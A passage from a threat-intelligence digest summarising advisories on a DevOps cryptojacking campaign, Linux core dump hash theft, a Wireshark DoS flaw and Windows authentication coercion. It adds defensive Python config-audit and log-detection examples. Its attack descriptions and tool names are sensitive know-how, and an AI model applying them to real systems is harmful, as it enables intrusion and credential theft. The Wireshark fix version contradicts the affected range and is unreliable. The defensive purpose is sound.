- Block access to known malicious domains and monitor for connections to suspicious infrastructure.
- Deploy endpoint protection with behavioral analysis to detect multi-stage script execution and RAT deployment.
- Regularly review and restrict the use of legitimate remote administration tools within the environment.
References:
https://thehackernews.com/2025/06/fake-docusign-gitcode-sites-spread.html
Cryptojacking Campaign Exploits DevOps APIs and Open WebUI Systems
A new cryptojacking campaign, tracked as JINX-0132, is targeting publicly accessible DevOps infrastructure—including Docker, Gitea, HashiCorp Consul, and Nomad servers—to deploy cryptocurrency miners. Attackers are leveraging misconfigurations and known vulnerabilities, using off-the-shelf tools from GitHub to evade attribution and detection.
Key Details:
- Targets: Publicly exposed Docker, Gitea, Consul, Nomad, and Open WebUI systems
Attack Methods:
- Exploits Docker API to spin up containers running XMRig miners
- Leverages Gitea misconfigurations (e.g., INSTALL_LOCK=false, RCE via git hooks)
- Abuses Consul’s service registration and health checks for code execution
- Exploits Nomad’s insecure default API to create jobs that download and run XMRig miners
- Uses Open WebUI’s plugin system to upload and execute malicious Python scripts
Payloads:
- XMRig and T-Rex cryptocurrency miners
- Java-based loaders and infostealers (on Windows)
- Linux persistence via systemd services and process hiding libraries (processhider, argvhider)
- Windows infostealer targeting Discord and Chrome wallet extensions
Observed Infrastructure:
- Downloaded tools and payloads directly from GitHub repositories
- C2 and payload hosting via Discord webhooks and IP 185.208.159[.]155
Mitigation/Workaround:
- Audit and secure all DevOps and cloud management interfaces; restrict public access
- Apply security patches and enforce strong authentication for Docker, Gitea, Consul, Nomad, and Open WebUI
- Monitor for unauthorized container creation, suspicious jobs, or plugin uploads
- Use process monitoring to detect hidden mining activity and infostealer behavior
- Remove unnecessary internet exposure for all management and training systems
- Educate teams about the risks of misconfiguration and the importance of regular security reviews
References:
https://thehackernews.com/2025/06/cryptojacking-campaign-exploits-devops.html
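Two of the misconfigurations listed above can be checked directly from the service configuration. As an added example that is not part of the original digest, the following audit parses a Docker daemon.json for API listeners without TLS client authentication and a Gitea app.ini whose INSTALL_LOCK is not set to true; the sample configurations are constructed, and the management address is a placeholder.

```python
import json
import configparser
from urllib.parse import urlparse

# Constructed sample configurations (not taken from the report): a weak and a hardened
# variant of a Docker daemon.json and of a Gitea app.ini, in the formats the real tools use.
DOCKER_DAEMON_WEAK = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
DOCKER_DAEMON_HARDENED = (
    '{"hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"], '
    '"tlsverify": true, "tlscacert": "/etc/docker/ca.pem"}'
)
GITEA_APP_INI_WEAK = "[security]\nINSTALL_LOCK = false\n"
GITEA_APP_INI_HARDENED = "[security]\nINSTALL_LOCK = true\n"

def audit_docker_daemon(daemon_json):
    """Flag TCP listeners of the Docker Engine API that lack TLS client authentication
    or are bound to every interface; anyone who can reach such a listener can start containers."""
    cfg = json.loads(daemon_json)
    findings = []
    for host in cfg.get("hosts", []):
        url = urlparse(host)
        if url.scheme != "tcp":
            continue  # unix sockets are protected by file permissions
        if not cfg.get("tlsverify", False):
            findings.append(f"docker: {host} is an unauthenticated API listener")
        elif url.hostname in ("0.0.0.0", "::"):
            findings.append(f"docker: {host} is bound to all interfaces")
    return findings

def audit_gitea(app_ini):
    """Flag an app.ini whose installer is still reachable (INSTALL_LOCK not true)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(app_ini)
    lock = cp.get("security", "INSTALL_LOCK", fallback="false").strip().lower()
    if lock != "true":
        return ["gitea: INSTALL_LOCK is not true, so the web installer can be re-run remotely"]
    return []

def audit_all(daemon_json, app_ini):
    """Run both checks and return the combined list of findings (empty means clean)."""
    return audit_docker_daemon(daemon_json) + audit_gitea(app_ini)

if __name__ == "__main__":
    for label, d, g in [("weak", DOCKER_DAEMON_WEAK, GITEA_APP_INI_WEAK),
                        ("hardened", DOCKER_DAEMON_HARDENED, GITEA_APP_INI_HARDENED)]:
        print(label, audit_all(d, g) or ["no findings"])
```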
Linux Core Dump Flaws Enable Password Hash Theft in Ubuntu, RHEL, and Fedora
Two newly disclosed vulnerabilities in Linux core dump handlers—apport (Ubuntu) and systemd-coredump (RHEL, Fedora)—could allow local attackers to extract sensitive information, including password hashes, from privileged process memory. These race condition bugs, tracked as CVE-2025-5054 and CVE-2025-4598, highlight the risks of improper core dump handling in multi-user environments.
Key Details:
- CVE-2025-5054 (CVSS 4.7):
- Affects Canonical apport up to 2.32.0
- Race condition allows a local attacker to exploit PID reuse and Linux namespaces to access core dumps from privileged processes
- CVE-2025-4598 (CVSS 4.7):
- Affects systemd-coredump
- Attackers can force a SUID process to crash, then quickly replace it with a non-SUID binary using the same PID, gaining access to the original core dump and potentially reading sensitive data such as /etc/shadow password hashes
Attack Scenario:
- Exploiting these flaws requires local access and the ability to win a race condition, but successful attacks can expose password hashes, encryption keys, or other confidential data from core dumps.
Impacted Systems:
- Ubuntu (apport)
- RHEL, Fedora (systemd-coredump)
- Debian is not affected by CVE-2025-4598 by default unless systemd-coredump is manually installed
- Amazon Linux and Gentoo have issued similar advisories
Mitigation/Workaround:
- Apply security updates for apport and systemd-coredump as soon as available
- As an immediate mitigation, disable core dumps for SUID binaries by running:
- echo 0 > /proc/sys/fs/suid_dumpable
(Note: This will prevent crash analysis for SUID binaries but blocks the attack vector.)
- Enforce strict access controls and monitor for suspicious local activity
- Regularly audit system configurations and restrict unnecessary local user accounts
References:
https://thehackernews.com/2025/05/new-linux-flaws-allow-password-hash.html
Wireshark Vulnerability Enables DoS via Malicious Packet Injection (CVE-2025-5601)
A critical vulnerability in Wireshark, the widely used network protocol analyzer, could allow attackers to trigger denial-of-service (DoS) attacks by injecting malformed packets or distributing corrupted capture files. The flaw, tracked as CVE-2025-5601 (wnpa-sec-2025-02, CVSS 7.8), affects millions of users and has significant implications for organizations relying on Wireshark for network monitoring and incident response.
Key Details:
- CVE: CVE-2025-5601
- Severity: High (CVSS 7.8)
- Vulnerability Type: Buffer overflow (CWE-120) in the column utility module
Affected Versions:
- Wireshark 4.4.0 through 4.4.6
- Wireshark 4.2.0 through 4.2.12
Attack Vectors:
- Injection of malformed packets into monitored network traffic
- Distribution of malicious packet capture files to Wireshark users
Impact:
- Successful exploitation causes Wireshark to crash, disrupting network analysis and monitoring operations
- Potential to impact real-time security monitoring and incident response in enterprise environments
Mitigation/Workaround:
- Upgrade immediately to Wireshark version 4.4.7 or 4.2.12, which contain patches for this vulnerability
- Only open capture files from trusted sources
- Limit packet capture operations to trusted network segments
- Implement network segmentation to reduce exposure
- Review and update network monitoring security protocols regularly
References:
https://www.wireshark.org/security/wnpa-sec-2025-02.html
https://nvd.nist.gov/vuln/detail/CVE-2025-5601
Windows Authentication Coercion Attacks Threaten Enterprise Networks
Authentication coercion attacks remain a significant risk to enterprise Active Directory environments, enabling attackers with limited privileges to escalate to domain-wide administrative access. Despite Microsoft’s ongoing security enhancements, these techniques continue to evolve and exploit gaps in Windows authentication protocols and service configurations.
Key Details:
- Attack Techniques:
- Abuse of Remote Procedure Call (RPC) interfaces such as MS-RPRN (PrinterBug), MS-EFSR (PetitPotam), MS-DFSNM (DFS Coercion), and MS-WSP (WSP Coercion)
- Coercion of Windows computer accounts to authenticate with attacker-controlled systems, enabling credential relay and privilege escalation
- Exploitation of legitimate Windows services, including printer management and encrypted file services, to trigger authentication flows
Recent Developments:
- Attack tools (e.g., ntlmrelayx.py) have been updated to bypass Microsoft’s mitigations by leveraging new RPC server capabilities
- Automated modules (e.g., NetExec efsr_spray) can activate vulnerable services and exploit SMB shares, including printer queues
- HTTP-based coercion remains viable via the WebClient service and .searchConnector-ms files on accessible shares
Microsoft Protections:
- Extended Protection for Authentication (EPA), LDAP channel binding, and SMB signing are now enabled by default on new Windows Server and Windows 11 installations
- Upgraded systems may retain legacy configurations, leaving them exposed
- Some mitigations, such as disabling unencrypted AD CS Web Enrollment APIs, are only active on fresh installs
Impact:
- Attackers can impersonate computer accounts, abuse S4U2Self and Resource-Based Constrained Delegation (RBCD), and potentially gain DCSync privileges for full domain compromise
- Kerberos relaying attacks are expected to become more prominent as NTLM is phased out
Mitigation/Workaround:
- Enforce SMB signing and LDAP channel binding across all Windows systems, not just new installations
- Audit and disable unnecessary services, especially WebClient, on all endpoints
- Regularly review and update group policies to ensure modern authentication protections are in place
- Monitor for suspicious authentication attempts and RPC activity, particularly involving computer accounts
- Educate IT teams on evolving coercion and relay attack techniques and ensure prompt application of security updates
References:
https://cybersecuritynews.com/windows-authentication-coercion-attacks/
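The monitoring point above, "suspicious authentication attempts ... particularly involving computer accounts", can be turned into a concrete check. As an added example that is not part of the original article, the following code runs over constructed 4624-style logon records and flags network logons where a computer account arrives from an address other than the one the inventory assigns to that computer, then groups the hits by source to surface one host presenting several machine accounts; the events, hostnames, addresses and the inventory mapping are all hypothetical.

```python
from collections import defaultdict

# Constructed sample logon events in a trimmed 4624-like shape (not real logs);
# field names follow the Windows Security log's 4624 event data.
SAMPLE_EVENTS = [
    {"TargetUserName": "WS01$", "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.21", "WorkstationName": "WS01"},
    {"TargetUserName": "FS01$", "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.30", "WorkstationName": "FS01"},
    {"TargetUserName": "FS01$", "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.99", "WorkstationName": "WS99"},
    {"TargetUserName": "DC01$", "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.99", "WorkstationName": "WS99"},
    {"TargetUserName": "jsmith", "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.99", "WorkstationName": "WS99"},
]

# Constructed asset inventory (hypothetical): the address each domain computer is expected to use.
ASSET_IPS = {"WS01": "10.0.0.21", "FS01": "10.0.0.30", "DC01": "10.0.0.5"}

def is_computer_account(name):
    return name.endswith("$")

def find_relayed_machine_logons(events, asset_ips):
    """Return network logons in which a computer account arrives from an address other
    than the inventory address of that computer. A coerced, relayed machine authentication
    has exactly this shape: the account belongs to one host, the packets come from another."""
    hits = []
    for ev in events:
        user = ev.get("TargetUserName", "")
        if ev.get("LogonType") != 3 or not is_computer_account(user):
            continue
        expected = asset_ips.get(user[:-1].upper())
        src = ev.get("IpAddress", "-")
        if expected is None or src in (expected, "-", "127.0.0.1", "::1"):
            continue  # unknown host, or a logon from the host itself
        hits.append({"account": user, "source_ip": src, "expected_ip": expected,
                     "package": ev.get("AuthenticationPackageName"),
                     "workstation": ev.get("WorkstationName")})
    return hits

def sources_touching_many_accounts(hits, threshold=2):
    """Group hits by source address; one address presenting several different
    computer accounts is the pattern of a relay host fed by a coercion sweep."""
    by_src = defaultdict(set)
    for h in hits:
        by_src[h["source_ip"]].add(h["account"])
    return {ip: sorted(accts) for ip, accts in by_src.items() if len(accts) >= threshold}

if __name__ == "__main__":
    hits = find_relayed_machine_logons(SAMPLE_EVENTS, ASSET_IPS)
    for h in hits:
        print(f"{h['account']} via {h['package']} from {h['source_ip']} (expected {h['expected_ip']})")
    print(sources_touching_many_accounts(hits))
```

Hosts with several addresses (VPN, multiple NICs) need every address listed in the inventory, otherwise their own logons will be reported.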